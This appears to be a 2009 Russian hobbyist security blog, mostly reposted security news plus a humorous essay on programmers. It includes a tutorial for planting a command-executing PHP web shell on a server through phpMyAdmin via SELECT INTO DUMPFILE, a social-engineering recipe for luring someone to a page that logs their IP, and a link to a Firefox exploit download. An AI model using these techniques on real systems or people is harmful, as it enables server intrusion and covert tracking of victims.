Ну и пятый фактор это образ жизни. Не сказать, чтобы он у программистов был очень здоровый, но с другой стороны я думаю, что пора бы уже пересмотреть этот термин. Согласитесь, все эти упругие мускулы, крепкие ноги и ловкие руки не являются залогом выживания в современном мире. А даже наоборот, являются опасной роскошью и повышают риск помереть в цвете лет (например, подхватив СПИД от очередной девицы, которая повисла на тебе в баре). Я давно уже заметила, что дольше всех живут не спортсмены и комсомольцы, а буфетчики и вахтеры. Не те, кто тренировался, а те, кто изнашивался как можно меньше. С этой точки зрения программисты практически законсервированы! Они как стеклянные банки - если не ронять, то практически вечны.

А если общность имеет неограниченный доступ к благам, хорошо размножается и к суицидам не склонна, то, что может ей помешать ей вытеснить другие виды и захватить мировое господство? Вот и я о том же.

Единственное, уязвимое место программистов это их крайне низкая способность к объединению и взаимодействию. Обороняться стаей они не способны, потому что у них проблемы с общением, и каждый из них считает себя умнее других.

От этого самоорганизующиеся программистские системы не эффективны в плане самообеспечения, и совершено не устойчивы к внешним воздействиям. Проще говоря, если кучку программистов оставить на некоторое время без присмотра (читай без управления), они очень быстро скатываются в производство не продукта, а прикольных фиговин для самих себя. Как правило, эти фиговины остальным людям не интересны, поэтому программистам перестают давать за них деньги. Соответственно программисты умирают от голода.

Но на этот случай у программистов тоже есть регулирующий механизм: Менеджер. Их самый страшный враг и единственный друг. С одной стороны он заставляет их делать то, что им не интересно, тем самым подкашивая их ощущение бога, но с другой - он обеспечивает их выживание, сохраняя востребованость продукта, поэтому они его терпят. По сути, менеджер такой же залог выживания программиста, как фермер для пшеницы: культуру необходимо возделывать, иначе она дичает.

Поэтому если в кучке программистов заводится толковый менеджер, они, сцуко, делаются непобедимыми!

В общем я думаю, что если расклады не изменятся, то все остальные группы населения постепенно переубиваются ап стену, а программисты останутся. И люди будущего будут не теми гармонично развитыми мультиталантливыми суперменам как у Ефремова в «Часе Быка», а программистами с легкой норвежской примесью.

Ах, да, чуть не забыла вам сказать: норвеги тоже выживут, потому что они не пьют, не курят, все как один бегают на лыжах, внешним миром не интересуются и живут в согласии с природой.

Источник: http://users.livejournal.com/akme_/154221.html

Обращение к народу :)

Извиняюсь что уже как пару месяцев не чего не писал и не занимался блогом,
просто времени становиться все меньше и меньше . . .

И вообще я подумал как нибудь обновить блог,что нибудь изменить - поэтому обращаюсь к вам за советом :

// Чтобы сделать???

А так же я начал поиски единомышленников,людей которых болеют информационной безопасностью и не только или просто людей которые могут писать интересные статьи на эту тему. . .

Отзывайтесь,советуйте - можно вместе сделать не плохой проект.

7 мая 2009 г.

Данные об американском ударном истребителе были в файлообменных сетях еще в 2005 году

http://www.flightglobal.com/blogs/aircraft-pictures/2008/05/16/F-35large.jpg

Эксперт сообщил, что данные об американском унифицированном ударном истребителе просочились в файлообменные сети еще в 2005 году. Согласно свидетельским показаниям исполнительного директора одной из софтверных фирм, данные о новейшем американском унифицированном ударном истребителе, об утечке которых было объявлено в прошлом месяце, на самом деле были доступны в файлообменных сетях уже на протяжении четырех лет.

В апреле газета The Wall Street Journal сообщила, что хакерам (предположительно, из Китая) удалось взломать компьютеры Министерства обороны США и загрузить терабайты данных, касающихся находящегося в разработке 300-миллиардного проекта по созданию новейшего ударного истребителя.

Однако в ходе слушаний на заседании парламентского Комитета по энергетике и торговле глава фирмы Tiversa, занимающейся предоставлением услуг по мониторингу p2p-трафика, заявил, что данные, касающиеся этого проекта, были обнаружены в файлообменных сетях еще в январе 2005 года. По словам Роберта Бобака, его фирма незамедлительно поставила в известность об этом Министерство обороны США и другие федеральные ведомства.

Информация об истребителе просочилась в файлообменники с расположенных в Ирландии и штате Джорджия компьютеров, принадлежащих одному из подрядчиков. И хотя пока остается невыясненным, были ли данные, о которых сообщила газета The Wall Street Journal теми же самыми, что и данные, которые попали в файлообменные сети, очевидным становится тот факт, что информация о проекте попала в открытый доступ по крайней мере на два года раньше, чем сообщала пресса.

Это уже не первый случай, когда компания Роберта Бобака докладывает о наличии в p2p-сетях секретной и важной информации. Например, в марте там сообщили о том, что в открытой папке на одном из компьютеров в Иране содержится информация о навигационном оборудовании и аппаратуре управления и связи вертолета, который в настоящее время используется президентом США Бараком Обамой. В компании полагают, что данные сведения попали в обменники еще летом прошлого года.

Взлом сервера через базу данных

/* Всем привет!
Давненько у меня не было времени чего нибудь написать,рассказать,опубликовать ну и т.д. и т.п.
И вот наконец я нашел пару минуток... */

Сегодня расскажу о взломе сервера через базу данных :
{ это не пособие а общее представление о такого рода атаках; }

Предположим что вы имеете доступ к PHPMyAdmin или просто к базе данных какого нибудь сервера - имеется ввиду доступ с администраторскими привилегиями а не просто Guest. // поскольку нам нужно будет создать таблицу
Кстати существует множество эксплоитов под PhpMyAdmin,а также есть особо продвинутые серверы где даже пароля для доступа не надо,сразу получаешь все привилегии......

Вообщем идем в SQL Query и вписываем следующие :

CREATE TABLE qwerty(
stack TEXT
) TYPE=MYISAM;

INSERT INTO qwerty(stack)
VALUES(

); // в этом блоке не большая ошибочка специально....

Дальше нам нужно узнать главную директорию сайта для этого вписываем @@datadir и получаем путь к root directory...
{ путь нужно знать,потому что создать файл запределами этой директории не получится да нам и не надо :); }

Двигаемся дальше...создаем файл на удаленном компьютере используя следующий код :

select * into dumpfile 'путь к главной директории сервера/имя файла.php' from qwerty;

например :

select * into dumpfile 'c:/appserv/www/exp.php' from qwerty;

После успешного создания PHP файла,смело идем на сервер http://имя сервера/имя созданного файла.php?v=пишем команду,например :
http://имя сервера/имя созданного файла.php?v=tasklist

Отсюда я думаю уже будет легче продвигаться к задуманому....

{ статья написанна только в ознакомительных целях;
это не пособие по хаку а просто описание такого рода аттак; }
YuV4iK

2 апр. 2009 г.

Conficker заразил компьютерную сеть израильской армии


http://www.plugot.com/images/itempics/1051a_large.jpg
В конце прошлой недели во внутреннюю сеть израильской армии (ЦАХАЛ), именуемую "ЦАХАЛ-NET",проник компьютерный вирус Conficker, уже поразивший миллионы компьютеров по всему миру.

Ссылаясь на источники в компьютерном подразделении ЦАХАЛа, израильские СМИ сообщают, что компьютерный червь был занесен в сеть одним из сотрудников подразделения мониторинга. Вирус находился на флэш-карте (Disk on key), использование которых запрещено служебными инструкциями. Червь скопировал себя со сменного носителя информации на жесткий диск и начал свое распространение по сети. Это произошло в прошлый четверг, 26 марта.

На следующий день, в пятницу, 27 марта, вирус заблокировал доменных пользователей и локальных пользователей на компьютерах подразделения, парализовав работу.

Ближе к вечеру командиры подразделения были вынуждены обратиться в Главный военный раввинат за разрешением "мобилизовать" для устранения неисправности специалистов компьютерного подразделения. Разрешение раввинов было необходимо, так как работать специалистам по компьютерной безопасности предстояло в субботу.

Специалистам по компьютерной безопасности ЦАХАЛа удалось обнаружить проблему и вычистить вирус до того, как он "полностью парализовал работу "ЦАХАЛ-NET".

30 мар. 2009 г.

Атаки хакеров происходят примерно каждые 39 секунд

Согласно данным исследования специалистов из университета Мериленда (США), хакерские атаки в глобальной сети происходят постоянно, однако, проанализировав последние статистические данные в университете подсчитали, что в Сети каждые 39 секунд происходит новая компьютерная атака.

В отчете говорится, что чаще всего хакеры не используют каких-либо хитроумных методов для взлома, а прибегают к самому древнему и самому простому методу взлома - Brute Force, или подбор паролей методом простого перебора различных вариантов.

"Конечно, большинство атак проводятся не вручную, а при помощи различных скриптов, работающих со словарями" , - говорит Мишель Кукье, один из авторов исследования.

Второй по популярности метод атак - использование готовых наборов для получения доступа, которые в своей работе используют различные уязвимости программного обеспечения, которое может быть установлено на компьютере-жертве.

"Полученные данные говорят о том, что в среднем в интернете совершается 2 244 атаки ежедневно, кроме того, если учесть что атаки, как правило, длятся не одну-две секунды, а гораздо дольше, то можно утверждать, что атаки хакеров не прекращаются вообще никогда", - дополняет он.

Исследователи говорят, что провели интересный эксперимент: подключили к интернету четыре компьютера под управлением Linux и уже менее чем через сутки системные журналы одной из машин зафиксировали попытки удаленного захода на компьютер при помощи перебора простых логинов и паролей.

На основе статистических данных, которые были получены в результате изучения словарей паролей, самым распространенным логином у всех без исключения рассмотренных хакерских программ был логин root, на втором месте - admin. Напомним, что именно эти логины, как правило, устанавливаются в большинстве систем по умолчанию для администраторов, а получив администраторский доступ, хакер фактически берет систему в свое полное распоряжение.

Другими распространенными буквосочетаниями были: 'test', 'guest', 'info', 'adm', 'mysql', 'user', 'administrator' и 'oracle'.

Все эти логины специалисты советуют не использовать вообще, так как именно на них в первую очередь обращают внимание злоумышленники.

Кроме того, исследователи выяснили, что во многих случаях подобрать пароль не составляло никакого труда, так как он либо полностью соответствовал логину, либо был представлен одним из буквенных вариантов того же логина.

Самыми популярными паролями стали варианты 123, 123456, password, 1234, 12345, passwd, test и 1 (даны в порядке убывания популярности).

По словам Девида Рамсброка, одного из составителей отчета, поражает то, что люди, установившие подобные пароли на корпоративные- и веб-серверы, прекрасно знают об уязвимостях таких вещей и тем не менее человеческая беспечность пока по-прежнему берет верх во многих случаях.

Также специалисты советуют проверить не только администраторские, но и гостевые записи на надежность, так как по данным статистики, многие владельцы серверов узнают о том, что на их серверах "поселились" злоумышленники лишь спустя месяцы.

http://www.hackzone.ru/news/view/id/5204/

18-летний создатель ботнета получил работу

http://images.smh.com.au/ftsmh/ffximage/2009/03/24/akill2_wideweb__470x405,0.jpg

Хакер-подросток, участвовавший в краже нескольких миллионов долларов, был оправдан и принят на работу в телекоммуникационную компанию.

Как сообщает Associated Press, новозеландец Оуэн Тор Уокер, принявший участие в организации одной из самых масштабных компьютерных атак за последнее время, был принят в штат телекоммуникационного гиганта TelstraClear в качестве консультанта по безопасности. По словам представителя компании, подросток имеет все необходимые знания для того, чтобы объяснить руководству компании о возможных угрозах их компьютерным сетям.

В июле прошлого года 18−летний тинэйджер был обвинен ФБР в содействии международной группе хакеров. При помощи написанного им ботнета (который был назван, кстати, в его честь – «AKILL») они получили доступ к более чем 1,3 млн компьютеров, а затем, используя личные данные невинных людей, переводили деньги с чужих счетов. По примерным подсчетам, ущерб, который нанесли злоумышленники, составил около $20 млн.

Первоначально Уокеру грозил срок до 10 лет, однако потом судьи смягчились, и после выплаты штрафа с него были сняты все обвинения. Сейчас он уже успел провести несколько семинаров в TelstraClear. "Он просто объясняет, какие виды угрозы наиболее опасны и какие меры следует принять в том или ином случае", — пояснил представитель телекоммуникационной компании.

На сегодняшний день компьютерные атаки уже приобрели опасные масштабы, и, быть может, именно такие случаи – когда человек из хакерской среды переходит на "сторону добра" — позволят более качественно проектировать системы безопасности.

http://www.xakep.ru/post/47623/default.asp

// Кстати судьи смягчились потому что парень страдает аутизмом

Израильские хакеры атаковали сайт "Хизбаллы"


http://www.securitylab.ru/upload/iblock/849/8490f0e1a60ea4e115b32e8a735a1c75.jpg

На прошлой неделе израильская компания, специализирующаяся на безопасности в сети, вывела из строя англоязычную версию сайта движения "Хизбалла" english.hizbollah.tv.

Для организации DoS-атаки специалисты компании Applicure применили "дешевое, доступное и легкое в использовании компьютерное обеспечение". При этом были использованы программы "разработанные китайскими хакерами".

Использованный компанией Applicure вирус пытается заразить как можно большее количество компьютеров, подключенных к сети, и использовать их для атаки против сайта "Хизбаллы".

http://www.securitylab.ru/news/376510.php

// Просто не мог оставить эту новость не замеченной :)

Новая версия Mozilla Firefox 3.0.8


http://linux.billera.eu/wp-content/firefox.jpg

версия 3.0.8, выпущена 27 марта 2009 года
В Firefox 3.0.8 устранено две критические уязвимости в системе безопасности, найденные в Firefox 3.0.7:

MFSA 2009-13 Arbitrary code execution through XUL element
MFSA 2009-12 XSL Transformation vulnerability

Качаем обновляемся,а тем кому интересно вот и сам эксплойт :
http://milw0rm.com/sploits/2009-ffox-poc.tar.gz

Работает на Windows,Mac & Linux.

http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.8

YuV4iK

23 мар. 2009 г.

Не плохой способ узнать IP

http://sonzofthunder.files.wordpress.com/2007/09/world-wide-web.jpg

Как узнать IP человека если у вас есть только его почта или другой способ связи с ним >?
Ну во первых нам понадобиться самые малые знания в СИ(социальная инженерия),какой нибудь бесплатный хостинг с поддержкой PHP и небольшой скриптик.
Начнем мы с поиска бесплатного хостинга с поддержкой PHP,таких достаточно.
Регемся,выбираем изящный хоть и бесплатный домен и заливаем туда(обычно это папка WWW) следующие файлы :

index.php :
------------------------------


Замечание : можно добавить переадресацию или еще чего...вообщем фантазируем.
------------------------------

log.txt

Залили?Можете сделать проверку,зайдите на index.php а потом на log.txt,если все сделали как я описал то в log.txt вы увидете свой IP.
Будем надеется что вы уловили смысл и цель этого маленкого проекта.
Представим что у нас есть мыло человека вася_пупкин@хрен_почта.ру,нам очень нужно узнать его IP.
Заходим в google там пытаемся найти как можно больше информации про этого самого Васю Пупкина,для чего это нужно?
Для того чтоб связавшись с вами он не заподозрил что вы полулам,то есть для маскировки.
Предположим выяснили мы что он учиться в школе номер 007,создаем себе левое мыло и используя данные которые мы собрали о Васе так сказать социально инженируем,то есть заставляем его кликнуть на ссылку ведущею к вам в капкан.
Вася кликает и вы получаете его IP все достаточно просто...

Вывод : не кликайте на первые попавшиеся линки,тщательно проверяйте мыльницу...

YuV4iK

Интересные новости за последнею неделю

Давненько я не обновлял блог из за проектов и учебы но щас начну навёрствовать упущенное :

Пентагон займется учебными атаками -> http://www.xakep.ru/post/47552/default.asp

Министерство обороны США готовится создать новый кибернетический центр, сотрудники которого будут заниматься моделированием различных интернет-атак, а также их анализом. Проект, которым Пентагон будет заниматься совместно с Агентством по перспективным оборонным научно-исследовательским разработкам (DARPA), получил название "Национальный киберполигон" (National Cyber Range, NCR).

Как сообщает Softpedia, в распоряжении NCR окажутся "хакерские тренажеры", которые будут использоваться для создания учебных сетевых атак на американские серверы – военные, правительственные и гражданские. Тщательному изучению будет подвергаться не только техническая сторона вопроса, но и социальный фактор, а именно – как будут вести себя люди, имеющие то или иное отношение к интернет-угрозам.

Microsoft выпускает утилиту для поиска уязвимостей -> http://www.xakep.ru/post/47546/default.asp

Для того чтобы обеспечить лучшее распознавание багов, которые впоследствии могут привести к появлению проблем с безопасностью, компания Microsoft выпускает утилиту, помогающую разработчикам классифицировать и устранять сбои в работе программ.

Утилита под названием "!exploitable" представляет собой плагин для отладчика Windows, который разделяет информацию о сбое по категориям, используя для этого два хэша, которые в Microsoft называют старшим и младшим хэшами. Используя эти хэши, плагин может группировать сбои, которые вызваны одним и тем же багом, даже если условия запуска программы, которые привели к появлению сбоя, отличались. Утилита также оценивает возможность использования бага злоумышленниками по собственной шкале, присваивая ей рейтинг "Уязвима к эксплоитам", "Возможно уязвима к эксплоитам", "Возможно, не уязвима к эксплоитам" и "Неизвестно".

Данная программа является последней из череды инструментов, выпущенных Microsoft для того, чтобы помочь сторонним разработчикам лучше обезопасить свое ПО. До этого в 2006 году были анонсированы три новых функции безопасности для Vista: рандомизация компоновки адресного пространства (ASLR), предотвращение выполнения данных (DEP) и защита от изменения ядра. В 2002 году Microsoft выпустила новые версии платформ разработки Visual C++, которые включали в себя технологию защиты от ошибки переполнения буфера, известную как GS flag. В эту среду, наряду с объявлением планов по выпуску плагина, компания также анонсировала, что в Visual Studio 2010 появится улучшенная версия этой технологии, позволяющая предотвращать переполнение массивов в базах данных и целочисленные переполнения.

Эксперты обновляют Metasploit для лучшего взлома Mac -> http://www.xakep.ru/post/47544/default.asp

Два известных взломщика Macintosh работают над обновлением широко используемой хакерской утилиты для того, чтобы облегчить взлом компьютеров Mac.

В течение последних нескольких дней исследователи без лишнего шума добавляли новые компоненты в набор утилит Metasploit, который используется экспертами в области безопасности и хакерами. По словам Дино Дай Зови, который вместе с Чарли Миллером рассказал о новом инструментарии в рамках конференции CanSecWest, Metasploit и до этого поддерживал атаки на Mac, однако до недавнего времени код для Mac был не настолько хорош, как утилиты для Windows и Linux. По его словам, их целью было сделать Mac OS X первоклассной мишенью для Metasploit.

В прошлом Миллер и Дай Зови прославились своими взломами компьютеров Macintosh на проводимом ежегодно в рамках конференции CanSecWest хакерском соревновании Pwn2Own. Не далее как в среду Миллер выиграл на этом соревновании приз в 5 000 долларов и ноутбук Mac, использовав для взлома его операционной системы ранее неизвестную уязвимость в браузере Safari.

В рамках этой же конференции эксперты продемонстрировали несколько программ, которые они разработали для Metasploit, в числе которых была утилита под названием "Pic the Vic", позволяющая сфотографировать пользователя взломанного компьютера Mac через его веб-камеру.

Кроме этого, исследователи портировали на Mac Windows-утилиту Meterpreter, которая позволяет получать информацию со взломанного компьютера и загружать на него другие программы. В течение нескольких следующих дней они также планируют добавить в Metasploit коды эксплоитов для некоторых пропатченных ранее Mac-уязвимостей.

Миллер подчеркнул, что хотя для Windows по-прежнему существует намного больше эксплоитов, чем для Mac, добавление нового кода в Metasploit означает, что его функциональность для атаки на компьютеры Mac и Windows станет более или менее одинаковой.

Индийский премьер заменил Outlook на СПО - http://www.securitylab.ru/news/370370.php

Компьютерный вирус, вызвавший нарушения в работе почты в офисе премьер-министра Индии, вынудил чиновников отказаться от Microsoft Outlook.

Новым решением для организации доставки почты был выбран открытый проект SquirrelMail. Система представляет собой распространяемое по лицензии GNU PHP-приложение, которые поддерживает HTML 4.0, а также протоколы IMAP и SMTP.

Работа вредоносной программы привела к тому, большинство писем не доходили до офиса индийского премьер-министра в течение трех месяцев прошлого года – с февраля по апрель 2008 г. Именно поэтому было решено заменить Microsoft Outlook на SquirrelMail – об этом заявил премьер-министр во время слушаний в индийской Центральной Комиссии по информации (Central Information Commission).

Между тем специалисты по сетевой безопасности выказывают удивление относительно того, как можно было в течение трех месяцев не замечать перебоев в доставке почты.

Узбекские ученые создали программу идентификации личности по форме ушей -> http://www.securitylab.ru/news/370415.php

Ученые Института математики и информационных технологий Академии наук Узбекистана создали и запатентовали пакет прикладных программ для идентификации личности по изображению ушных раковин.

Представители Государственного патентного ведомства Узбекистана пояснили принцип работы нового метода биометрической идентификации. По их словам, программы способны предварительно обработать изображения, локализовать ушную раковину и выделить контурные линии на изображениях. С помощью программы определяются идентификационные признаки, что и позволяет опознать личность по изображению ушных раковин.

Эксперты считают, что новый метод биометрической идентификации является более надежным, чем опознание по лицу, так как форма ушей человека не меняется с возрастом.

IE8 популярнее Google Chrome -> http://www.securitylab.ru/news/370433.php

По данным компании Net Applications, по состоянию на утро 23 марта рыночная доля браузера Microsoft Internet explorer 8 достигла 2,41 процента. По этому показателю новый браузер от Microsoft уже перегнал одного из своих конкурентов — Google Chrome, бета-тестирование которого завершилось в декабре 2008 года.

Напомним, что рыночная доля Google Chrome по итогам февраля текущего года составила 1,15 процента.

По данным Net Applications, уже спустя сутки после выхода Internet Explorer 8 его рыночная доля достигла 1,7 процента, а еще 24 часа — 2,22 процента. Утром 23 марта новый браузер Microsoft занимал 2,41 процента рынка.

Окончательная версия браузера Internet Explorer 8 вышла 19 марта. Первая бета-версия Internet Explorer 8 была выпущена в начале марта 2008 года. Релиз-кандидат этого браузера появился в январе 2009 года.

Блогер предлагает использовать в качестве «капчи» 3D-картинки -> http://www.securitylab.ru/news/370374.php

Как пользователь разнообразных интернет-ресурсов каждый из нас не раз проходил тест CAPTCHA (полностью автоматизированный публичный тест Тьюринга для различения компьютеров и людей), который заключается в необходимости ввести несколько символов, представленных в графическом виде, в специальное поле. Подобная задача, хоть и является очень простой для человека, оказывается чрезвычайно сложной и практически невыполнимой для различных «ботов». Известно, что тесты CAPTCHA сегодня выполняют задачу своеобразного фильтра, позволяющего отделить живого человека от программы, предназначенной для рассылки спам-сообщений посредством регистрации бесплатных аккаунтов на e-mail-сервисах, оставления сообщений на форумах, в комментариях к записям в блогах и пр.

Проблема заключается в том, что существующие «капчи» слишком сложны для восприятия. Стремясь ввести в заблуждение умнеющий из года в год искусственный интеллект, создатели тестов предлагают вниманию пользователей невообразимую мешанину из разноцветных линий, букв и цифр, расположенных на резко контрастном фоне. Некоторые картинки настолько неразборчивы, что лишь самые внимательные и остроглазые пользователи способны пройти проверку с первого раза.

Блоггер по имени Тэйлор Хэйворд нашел интересный способ решения проблемы и предложил использовать в качестве контрольных вопросов трехмерные изображения. В окне с вопросом будет отображаться изображение животного, например «портрет» зайца в профиль. А список возможных ответов будет включать ряд изображений других животных, «снятых» с различных ракурсов, включая картинку с зайцем, развернутым к зрителю спиной. Только человек сможет быстро и без труда определить, что на обеих картинках изображено одно и то же животное. В другом примере живой пользователь с легкостью разглядит нарисованную пару брюк в трехмерной куче белья, в то время как компьютер не сможет ответить на этот вопрос.

Метод авторизации, предполагающий небольшое число возможных ответов, вряд ли можно назвать предельно надежным. Поэтому автор идеи предлагает бороться с перебором вариантов путем увеличения списка возможных решений или генерирования новой картинки при получении неправильного ответа.

Постарался собрать наиболее интересные новости...

12 мар. 2009 г.

Хакеры нанесут удар по «краеугольным камням» Интернета

В ходе своего выступления на конференции O'Reilly Emerging Technology, Алекс Стамос (Alex Stamos), один из основателей группы iSEC Partners, сообщил, что в ближайшем будущем стоит ожидать удара со стороны хакерского сообщества по некоторым из «краеугольных камней» глобальной сети Интернет.

По-мнению эксперта, индустрия информационной безопасности пребывает в состоянии упадка. При непрерывном росте мощности и функциональности компьютерных систем, их защита становится все более и более слабой. Подтверждая свою точку зрения, Стамос привел успешные примеры атак с «отравлением кэша DNS», осуществленных изыскателем Дэном Камински, или недавно обнародованные методики взлома хеша MD5.

Стамос считает, что основная проблема заключается в безнадежной устарелости используемых технологий защиты. Большинство защищенных протоколов были разработаны еще до наступления «эпохи Интернета», а традиционные механизмы идентификации пользователя (такие, как популярный вопрос о девичьей фамилии матери) стремительно утрачивают свою актуальность с развитием социальных сетей. После решения перечисленных технологических проблем останутся не менее актуальные проблемы юридического характера. Правоохранительные органы не скоро смогут задерживать и привлекать к ответственности киберпреступников, проживающих на территории различных государств.

В то же самое время хакеры из талантливых энтузиастов, желающих лишь известности в определенных кругах, превратились в расчетливых дельцов. «10-15 лет назад хакеры не имели представления о том, какую выгоду можно извлечь из похищенных ими данных. Сегодня ситуация изменилась. На текущий момент существует несколько хорошо организованных хакерских группировок, для которых похищение идентификационных данных пользователей и персональной информации является основным источником доходов», - сказал Стамос.

По его словам, для решения наиболее насущных проблем производителям программного обеспечения необходимо сформировать принципиально новую модель раскрытия обнаруженных уязвимостей и выпуска соответствующих «патчей». Поставщикам средств защиты также рекомендуется работать в более тесном контакте друг с другом и не стремиться к извлечению выгоды из уязвимостей, обнаруженных в продуктах конкурента. Наконец, одной из наиболее действенных мер является «ограничение в правах» конечных пользователей. Вместо того чтобы загружать неопытных ПК-владельцев избыточной информацией о потенциальной опасности тех или иных действий, их следует лишить самой возможности выполнения таких операций.

«На сегодняшний день большинство обитателей глобальной сети не способны лично позаботиться о собственной безопасности, - уверен Стамос, - Это достаточно прискорбный факт, однако он является безусловной истиной, следовательно, данную проблему нельзя оставлять без внимания».

источник

Ведущие телепрограммы BBC Click взломали 22 тысячи компьютеров

http://www.faludi.com/wp-content/uploads/2008/05/bbc_click.jpg

Ведущие телепрограммы BBC Click совместно с экспертами заразили почти 22 тысячи компьютеров специально разработанным трояном и взяли их под контроль. Заражение комьютеров осуществлялось через веб-чаты . Данное мероприятие было устроено с целью показать серьезность современных угроз информационной безопасности.

В ходе эксперимента зараженные компьютеры получили команду на рассылку спама на два тестовых адреса. За несколько часов в эти ящики пришло несколько тысяч писем.

Затем ведущие BBC Click по предварительной договоренности с компанией Prevx, специализирующейся на IT-безопасности, устроили DDoS-атаку на специально подготовленный сайт. Как показал опыт 60 машин из ботнета было достаточно, чтобы целиком забить канал сервера запросами.

По окончании опыта данный ботнет был уничтожен, а пользователям посоветовали принять меры для защиты компьютеров. Сотрудники BBC больше не контролируют эти машины. В субботу 14 марта выйдет очередной выпуск BBC Click, в котором будет подробно рассказано об эксперименте.

источник

9 мар. 2009 г.

Уязвимость в PDF можно использовать даже без открытия файла

Иногда вредоносное приложение можно запустить даже не открывая файл. Представленный видеоролик показывает, как эксплоиты, использующие уязвимость при обработке JBIG2Decode в файлах формата PDF, запускаются даже без открытия документа.


В первом случае для запуска эксплоита достаточно было лишь один раз кликнуть по документу. Во втором случае для инициации атаки потребовалось поменять режим отображения Windows Explorer, выбрав "Эскизы страниц". В таком режиме Explorer отображает первую страницу PDF в виде эскиза. Во время рендеринга изображения происходит чтение файла, и эксплоит запускается. Ну и наконец в третий раз для начала работы вредоносного кода потребовалось лишь навести мышку на изображение документа, не кликая по нему. Чтобы данный способ сработал, PDF-файл должен содержать специальным образом подобранные метаданные, обращение к которым будет произведено во время запроса дополнительной информации при наведении мышки.

А теперь подробнее остановимся на том, почему эксплоиты срабатывают даже тогда, когда пользователь не открывает документ. Ответ кроется в использовании расширений оболочки Windows Explorer. Когда ты устанавливаешь Adobe Acrobat Reader, вместе с ним устанавливается и расширение оболочки Column Handler. Оно представляет собой специальную программу (объект COM), которая позволяет Windows Explorer считывать дополнительную информацию о файлах, такую как имя автора документа и так далее. И когда файл отображается в окнах Windows Explorer, данное расширение может быть вызвано для получения информации о файле. Расширение обращается к файлу и…

Поэтому эксперты советуют быть предельно внимательными при обращении с вредоносными файлами. В случае, если их изучение необходимо для работы, они рекомендуют пользователям переименовывать расширения опасных приложений и переносить их в зашифрованном виде.

В марте Microsoft выпустит три патча

Корпорация Microsoft на следующей неделе планирует выпустить три обновления, самое серьезное из которых направлено на пресечение возможности удаленного выполнения произвольного кода из-за бага в Windows.

Все три обновления связаны с безопасностью, причем два из них нацелены на борьбу со спуфингом. Упомянутое ранее обновление для устранения возможности удаленного выполнения вредоносного кода носит статус критического и затрагивает операционные системы Windows 2000, XP, Vista, Windows Server 2003 и 2008.

Это ежемесячное обновление не будет содержать патча для недавно обнаруженной дыры в Microsoft Office Excel, которая используется хакерами на протяжении нескольких последних недель. Впрочем, для борьбы с багом 24-го февраля компанией было выпущено специальное руководство.

Оставшиеся два обновления имеют статус важных. Целевыми платформами одного из них будут Windows 2000, XP, Vista, Windows Server 2003 и 2008, а второе затронет только Windows 2000, Windows Server 2003 и 2008.

С появлением 10-го марта новой порции патчей от Microsoft их общее число в этом году достигнет восьми.

http://www.xakep.ru/post/47383/default.asp

Музыкальный сервис Spotify подвергся атаке хакеров


http://davidreport.com/blog/wp-content/uploads/2008/10/spotify_logo.jpg


Шведский онлайновый музыкальный сервис Spotify подвергся хакерской атаке.

Злоумышленники похитили персональную информацию пользователей службы — электронные и почтовые адреса, личные сведения. К счастью, хакерам не удалось получить доступ к данным о кредитных картах. Spotify приносит извинения пользователям, пострадавшим в результате инцидента, и рекомендует всем зарегистрировавшимся на сайте до 19 декабря 2008 года изменить пароли.

Предполагается, что киберпреступники получили доступ к личным данным пользователей еще в конце прошлого года. Однако администрация Spotify узнала об этом только на минувшей неделе, после того как получила через сторонние источники сообщение от хакеров. Прямого контакта с ними у представителей сервиса не было, поэтому никто не может сказать, кто эти люди, из какой страны и какие цели они преследовали. Очевидно, что киберпреступники - профессионалы, потратившие не одну сотню часов на поиск бреши в системе безопасности Spotify.

Spotify является одним из самых известных интернет-ресурсов, который позволяет бесплатно слушать музыку на законных основаниях посредством приложения, подобного iTunes. Чтобы получить доступ к трекам, достаточно лишь зарегистрироваться и установить цифровой плеер.

источник

7 мар. 2009 г.

В Firefox больше багов чем в IE, но патчи к нему выходят быстрее

В прошлом году в браузере Firefox было обнаружено больше уязвимостей, чем в Internet Explorer, однако непропатченные дыры закрывались компанией Mozilla быстрее, чем в IE.

Ежегодный отчет от компании Secunia показал, что в 2008 году в Firefox было обнаружено 115 уязвимостей. Это больше, чем в Internet Explorer (31), Opera (30) и Safari (32), вместе взятых (это подтверждают и данные наших публикаций - в отчете "Толковый багтрак: обзор уязвимостей за второе полугодие 2008 года" Топ-10 самых уязвимых приложений возглавил Mozilla Firefox).

Однако Mozilla намного быстрее чем Microsoft реагирует на появление уязвимостей нулевого дня. Так, в 2008 году для устранения трех подобных дыр ей требовалось в среднем 43 дня, в то время как у Microsoft на это уходило порядка 100 дней, причем три обнаруженные в прошлом году бреши остаются не залатанными до сих пор.

Кроме того, в состав отчета от Secunia входит статистика о работе бесплатной для частных клиентов утилиты Secunia PSI, которая помогает искать обновления к программам. Она свидетельствует, что Firefox 2.0 остается не полностью пропатченным в 34% случаев. Это не очень здорово, однако показатели для Macromedia Flash Player 6.x (83%) и Sun Java JRE 1.5.x/5.x (96%) еще намного хуже.

Есть у Secunia информация и о дырах в плагинах к браузерам. Например, в ActiveX было найдено 366 багов, в Java – 54, в Adobe Flash -19, а в QuickTime -30 штук. С полной версией отчета можно ознакомится здесь (PDF).

http://www.xakep.ru/post/47385/default.asp

Исследователи сравнили антивирусы по эффективности эвристики


http://www.securitylab.ru/upload/iblock/aa6/aa6f9586ed4e86663409907796afe2d4.png

Anti-Malware опубликовал результаты теста антивирусов по эффективности эвристики: исследователи попытались выяснить, в каком антивирусе этот компонент защиты работает лучше.

В этом тесте Anti-Malware сравнивались эвристические компоненты антивирусной защиты (эвристики + generic-детект, т.е. расширенные сигнатуры), не принимая во внимание анализ системных событий (поведенческие блокираторы, HIPS). В качестве приложения к тесту производилось финальное измерение уровня детектирования на собранной коллекции на обновленных антивирусах через неделю после завершения основного теста. В результате фиксировалось качество обнаружения новых вирусов, а также эффективность работы классических сигнатурных методов каждого антивируса в дополнение к эвристике.

В тестировании принимали участие 14 наиболее популярных антивирусных программ, среди которых:

  1. Agnitum Outpost Antivirus Pro 2009
  2. Avast! Professional Edition 4.8
  3. AVG Anti-Virus 8.0
  4. Avira AntiVir Premium 8.2
  5. BitDefender Antivirus 2009
  6. Dr.Web 5.0
  7. ESET Nod32 Anti-Virus 3.0
  8. F-Secure Anti-Virus 2009
  9. Kaspersky Anti-Virus 2009
  10. Panda Antivirus 2009
  11. Sophos Anti-Virus 7.6
  12. Symantec Anti-Virus 2009
  13. Trend Micro Internet Security 2009
  14. VBA32 Antivirus 3.12

